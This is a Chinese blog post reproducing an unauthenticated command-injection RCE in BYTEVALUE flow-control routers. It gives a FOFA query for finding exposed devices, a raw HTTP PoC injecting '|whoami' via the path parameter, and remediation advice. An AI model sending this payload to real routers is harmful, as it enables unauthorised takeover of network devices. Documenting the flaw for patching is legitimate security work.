百为智能流控路由器 RCE漏洞复现

最新推荐文章于 2024-09-13 16:05:05 发布
最新推荐文章于 2024-09-13 16:05:05 发布
阅读量904 收藏 10
点赞数 8
分类专栏: 漏洞复现 文章标签: 智能路由器 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134781924
版权

0x01 产品简介

 BYTEVALUE 百为流控路由器是一款追求带宽利用率的多功能路由器。

0x02 漏洞概述

百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞,未经身份认证的攻击者可以利用此漏洞执行任意指令,获取服务器权限。

0x03 复现环境

FOFA:app="BYTEVALUE-智能流控路由器"

0x04 漏洞复现 

PoC

GET /goform/webRead/open/?path=|whoami HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x05 修复建议

目前官方已提供解决方案,请关注厂商主页更新:http://www.bytevalue.com/

通过防火墙等安全设备设置访问策略,设置白名单访问。

如非必要,禁止公网访问该系统。

0xSecl
关注
专栏目录
订阅专栏
BYTEVALUE 百为流控路由器远程命令漏洞(含批量验证poc)
weixin_43567873的博客
04-03 106
BYTEVALUE 百为流控路由器远程命令漏洞(含批量验证poc)
漏洞复现】BYTEVALUE智能流控路由器存在命令执行
zkaqlaoniao的博客
11-10 1330
百为智能流控路由器 /goform/webRead/open 路由的?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。
BYTEVALUE 百为流控路由器远程命令漏洞(含批量验证poc)(1)
2401_83946509的博客
04-15 720
BYTEVALUE百为流控路由拥有强大的多线分流,多线叠加负载均衡功能,加上领先的智能流控QOS技术能解决网吧,小区等公共营业场所带宽不够的难题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
百为智能流控路由器__命令执行【漏洞复现
m0_64366018的博客
01-25 522
直接访问URL就可以可以回显了,如果没有回显或者302跳转了说明漏洞不存在。
路由器端口镜像
m0_45081612的博客
10-25 4668
端口镜像(port Mirroring)功能通过在交换机或路由器上,将一个或多个源端口的数据流量转发到某一个指定端口来实现对网络的监听,指定端口称之为“镜像端口”或“目的端口”,在不严重影响源端口正常吞吐流量的情况下,可以通过镜像端口对网络的流量进行监控分析。在企业中用镜像功能,可以很好地对企业内部的网络数据进行监控管理,在网络出故障的时候,可以快速地定位故障。 实验过程 1.搭建如图所示拓扑 进行配 1.为路由器的每一个端口配置一个网段,配置云 a.由于数据需要交互,所以直接添加两个端口,开启双向通道
百为流控路由系统1.25.rar
08-09
百为流控路由系统
Tscan20240321一款综合扫描工具方便一键自动化全方位漏扫扫描
04-04
BYTEVALUE_百为流控路由器远程命令漏洞 C_Lodop打印服务系统存在任意文件读取漏洞 D-Link_DAR_8000操作系统命令注入漏洞 H3C_CVM_前台任意文件上传漏洞 H3Cflexfileupload任意文件上传漏洞 H3C多系列路由器存在前台...
百为路由
11-09
根据使用的操作不同可以分为基于windows平台和基于Linux/bsd平台开发的软件路由器,基于Windows平台的软件防火墙比较常见的有ISA Server、Winroute Firewall等,这些软件都是商业化的,通常根据授权用户数不同收费而...
网络运维故障处理案例
最新发布
golove666的博客
09-13 872
网络运维中的故障处理是网络管理员日常工作中非常重要的环节。
交换技术是一种在计算机网络和通信系统中广泛应用的关键技术,它主要通过交换设备(如交换机、路由器等)实现数据的转发和传输
weixin_45544617的博客
09-10 460
在互联网中,交换技术广泛应用于数据传输和通信,通过路由器和交换机等交换设备,数据能够在不同的互联网节点之间进行传输和交换,实现了全球范围内的互联通信。:软交换技术是一种基于软件实现的通信交换技术,它通过将呼叫控制和信令处理功能独立出来,并使用标准化的IP网络进行传输,在保证服务质量的同时实现了对多媒体业务和数据业务的支持。:电路交换是一种面向连接的交换技术,它在建立通信连接时,需要占用一定的通信资源(如带宽、传输线路等),并且在通信连接上保持一定的状态。二、交换技术的基本原理。
HCIP--<OSPF2>
shsbcheknexj的博客
09-11 974
OSPF不规则区域,OSPF数据库表,优化OSPF的LSA
华为ensp中vlan与静态路由技术的实现
2302_77397775的博客
09-12 685
trunk收到无tag帧,根据接口的pvid标记TAG帧;trunk接收时候,比较tag编号与允许通过列表(trunk vlan list);接着检查tag与1接口的pvid是否一致,一致则剥离tag帧发出;access发送数据帧,只能发送带自身接口pvid的数据帧,并且会在发送时候剥离tag帧;AR1中,目的ip地址,目的IP为pc2所在网段Ip可以不具体,虚拟局域网:将局域网从逻辑上划分为多个局域网,不同通过vlan编号区分;access收到带tag帧,判断与自身接口pvid是否一致,相同则接收;
网络设备安全
weixin_49171105的博客
09-09 594
针对交换机、路由器潜在操作安全风险,提供权限分级机制,每种权限级别对应不同操作能力。远程访问路由器一般通过路由器自身提供的网络服务来实现 远程通信是信息是明文,为增强远程访问的安全性,应建立一个专用网络用语设备管理。审计方式:控制台日志审计、缓冲区日志审计、终端审计、SNMP traps、AAA审计、Syslog审计。交换机安全威胁:交换机是网络基础设备,负责网络通信数据包的交换传输。物理安全:物理安全是网络设备安全的基础,物理访问必须得到严格控制。认证协议:AAA网络安全管理机制(认证、授权、计费)
VLAN原理与配置
小浪的学习笔记
09-08 709
CFI为0说明是标准格式,CFI为1表示为非标准格式。用于区分以太网帧、FDDI(Fiber Distributed Digital Interface)帧和令牌环网帧。长度为3比特,表示帧的优先级,取值范围为0~7,值越大优先级越高。IEEE 802.1Q标准对Ethernet帧格式进行了修改,在源MAC地址字段和协议类型字段之间加入4字节的802.1Q Tag。在VRP中,可配置的VLAN ID取值范围为1~4094。灵活打标签、移标签,PC-交换机、路由器-交换机、交换机-交换机。
计算机网络基础概念 交换机、路由器、网关、TBOX
qq_49973861的博客
09-07 786
工作有感而发,需要补充计算机网络知识。学海无涯,及时回头。
计算机网络 --- 【1】欢迎来到计算机网络/计算机网络基本概念/计算机网络、互连网、互联网的区别
xinxin的博客
09-10 862
计算机网络(Computer networking)是一个将众多分散的、自治的计算机系统,通过通信设备与线路连接起来,由功能完善的软件实现资源共享和信息传递的系统。计算机网络(简称为网络)由若干节点(node)和连接这些节点的链路(link)组成。网络中的节点可以是计算机、集线器、交换机或路由器等。
远程访问电脑共享文件
jiedianxiaobao的博客
09-10 694
在远程访问设备上(如手机、平板电脑或另一台电脑),从Google Play商店(对于Android设备)或App Store(对于iOS设备)下载并安装“Remote Desktop”(Microsoft远程桌面)应用程序。在进行远程访问时,请确保电脑和手机的网络连接稳定,并且已正确设置防火墙和路由器等网络设备以允许远程连接。在远程访问设备上,通过访问配置的外部IP地址和端口,即可访问电脑的共享文件。在目标电脑上,打开“开始”菜单,选择“设置”>“系统”>“远程桌面”。绑定完成后,设备将自动组网。
实战外网配置——光猫桥接+路由器PPPoE拨号+防火墙外网链路健康检查+外网流量负载均衡
weixin_43075093的博客
09-11 1012
一、适用场景: 1、企业规模较大时,1条公网带宽流量可能不足,需要用到多条公网出口时。 2、企业有业务需要静态ip映射,但是因静态ip专线价格较高,所以需要拨号光纤承载较多的下行流量。 3、当公网出口有多条链路,若从防火墙到运营商之间的其中一条故障,内网出去的流量会根据外网链路健康检查的结果,自动切换到好的链路上。 4、多条公网出口必然要考虑到每条链路的实用性,所以要做负载均衡,让每条链路发挥它的作用,提高线路利用率。 5、采用的方案:PPPoE光猫拨号、光猫桥接bridge模式;H3C路由器自动拨号、路由
百为STM3210E-EVAL开发板电路解析
"百为STM32开发板原理图提供了STM3210E-EVAL开发板的详细电路设计,涵盖了各个功能模块的连接和配置。该开发板集成了多种接口和外设,如I2S音频接口、MCO、GPIO、FSMC(Flexible Static Memory Controller)、USART...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值